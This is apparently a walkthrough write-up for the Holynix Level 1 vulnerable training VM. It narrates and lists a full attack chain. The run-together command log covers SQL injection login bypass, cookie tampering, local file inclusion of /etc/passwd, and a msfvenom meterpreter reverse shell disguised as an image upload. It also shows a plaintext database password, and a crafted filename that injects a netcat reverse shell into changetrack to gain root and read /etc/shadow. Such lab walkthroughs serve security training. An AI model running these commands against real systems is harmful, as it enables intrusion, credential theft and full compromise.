Back on the internal message board, the attacker discovers there is "changetrack" installed, configured to back up a certain folder and is scheduled to run every five minutes. This services is usually executed with the highest level of privileges, otherwise it wouldn't be able to back up everything possible. The attacker checks that the user he is using, alamo, has access to the folder which is being monitored; turns out only two users are (one of which is alamo!).
The attacker then checks a local copy of a public exploit database, exploitdb, to see if there are any known exploits for this service. There was only one result, which reveals that the service doesn't escape certain filenames, therefore filenames which have been crafted can cause the service to execute shell commands. The attacker notes the example filename, which is given, however instead of doing a "bind" connection, they choose to reserve it instead. Locally, the attacker sets up another listener, and remotely checks for, and, configures a program, netcat, which allows for the network connections to read and execute commands. The reason why the attacker flips the direction of netcat was to allow the target to establish, letting the attacker just wait, rather than for them to keep checking.
The attacker now waits for the changetrack service to be triggered, which shouldn't be long, as it was hinted in the message board; it backs up every five minutes...
...A little while later, the attacker notices that the remote system has executed their command and created a remote shell with the super user, root, account privileges.
Code:nmap 192.168.0.0/24 -sn -n us -H -msf -Iv 192.168.0.11 -p 1-65535 && us -H -mU -Iv 192.168.0.11 -p 1-65535 nmap -p 1-65535 -T4 -A -v 192.168.0.11 firefox 192.168.0.11 & # Username: g0tmi1k Password: ' OR 1=1 # id: alamo Right click -> View Page Info -> Headers Firefox -> Directory curl -s 192.168.0.11 curl -s --cookie "uid=1" 192.168.0.11 curl -s --cookie "uid=1" http://192.168.0.11/?page=employeedir.php | sed -e "s/ / \n/g; s/example.net/example.net\n/g" | grep example.net | sed "firstname.lastname@example.org//" curl -s --cookie "uid=1" http://192.168.0.11/?page=employeedir.php | sed -e "s/ / \n/g; s/example.net/example.net\n/g" | grep example.net | sed "email@example.com//" > /tmp/users wc -l /tmp/users for x in $(seq 1 64); do y=$(curl -s --cookie "uid=$x" 192.168.0.11 | grep Welcome, | sed "s/[ \t]*//; s/Welcome, //" | cut -d "." -f1) if [ $y ] ; then echo $x=$y ; fi done Firefox -> Tools -> Tamper Data -> Start Tamper firefox http://192.168.0.11/?page=ssp.php # Display File Tamper -> text_file_name: ssp.php http://192.168.0.11//index.php?page=ssp.php&text_file_name=/etc/passwd cat /tmp/users| sed 's/^/~/' >> /tmp/users cd /pentest/web/dirbuster java -jar DirBuster-0.12.jar -u http://192.168.0.11 # /tmp/users.txt msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 -f raw > /tmp/evil.jpg Firefox -> Tools -> Tamper Data -> Start Tamper firefox # Upload (fails) Tamper -> Cookie: uid=2 # id: etenenbaum firefox # Upload again firefox http://192.168.0.11/~etenenbaum/ # evil.jpg firefox http://192.168.0.11/?page=ssp.php # Display File Tamper -> text_file_name: /home/etenenbaum/evil.jpg http://192.168.0.11//index.php?page=ssp.php&text_file_name=upload.php http://192.168.0.11//index.php?page=ssp.php&text_file_name=transfer.php cd /tmp mv evil.jpg evil.php chmod +x evil.php ls -l evil.php tar -cvzf evil.tar.gz evil.php ls -l evil* msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 E firefox http://192.168.0.11/~etenenbaum/ sysinfo shell id pwd ls -lah cd /var/apache2 ls -lah cat config.inc python -c 'import pty; pty.spawn("/bin/sh")' mysql -u root -pmY5qLr007p@S5w0rD SHOW DATABASES; USE creds; SHOW TABLES; SELECT * FROM accounts; quit firefox http://192.168.0.11/index?page=messageboard.php # knockknock wget http://192.168.0.11/misc/knockknock-0.7.tar.gz tar zxvf knockknock-0.7.tar.gz cd knockknock-0.7 head -n 20 INSTALL python setup.py install cd /etc/knockknock.d/profiles/ ls -lAh cp -r alamo ~/knockknock exit exit exit exit wget -r -np --reject=index* 192.168.0.11/~alamo/knockknock/ mv 192.168.0.11/~alamo/knockknock ~/.knockknock/192.168.0.11 ls -lAh #cat config nmap -p 22 -T5 -v 192.168.0.11 #python /tmp/knockknock-0.7/knockknock.py -p 13820 192.168.0.11 python /tmp/knockknock-0.7/knockknock.py -p 22 192.168.0.11 && nmap -p 13820 -T5 -v 192.168.0.11 python /tmp/knockknock-0.7/knockknock.py -p 22 192.168.0.11 && ssh firstname.lastname@example.org # Ih@cK3dM1cR05oF7 id # sudo -l firefox http://192.168.0.11/index?page=messageboard.php # Changetrack cd /pentest/exploits/exploitdb grep -i changetrack files.csv cat platforms/linux/local/9709.txt ls -lah /home # development is set to nobody & developers cat /etc/group | grep developers # Alamo jljohansen cd /home/development ls -lAh whereis nc nc -lvp 443 touch "<\`nc 192.168.0.192 443 -e \$SHELL\`" ls watch -d -n 1 "netstat -ant" # wait 5 mins id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lAh /root/
- When starting the VM for the first time with VMware, select "Moved It" - otherwise it could cause issues (e.g. The target will not be visible!).
- There is the possibly of another method of gaining access, as well as different tools (e.g. burpsuite instead of using tamper data) or techniques (modify the SQL injection or permanently edit the cookie value) could be used to achieve the same effect.
- Some mistakes in the video are more obvious
- On reflection, a few commands should have been issues to verify the comments on the message box, such as: "ls /etc | grep -i changetrack", and "cat /etc/changetrack.conf".
Song: Hometown Glory (High Contrast Remix) - Adele & One Love- The Prodigy & Ill Behaviour - Danny Byrd
Video length: 12:55
Capture length: 55:21
Blog Post: g0tmi1k: [Video] Holynix - Level 1
Forum Post: http://www.backtrack-linux.org/forum...-videos/43880-[video]-holynix-level-1-a.html#post204837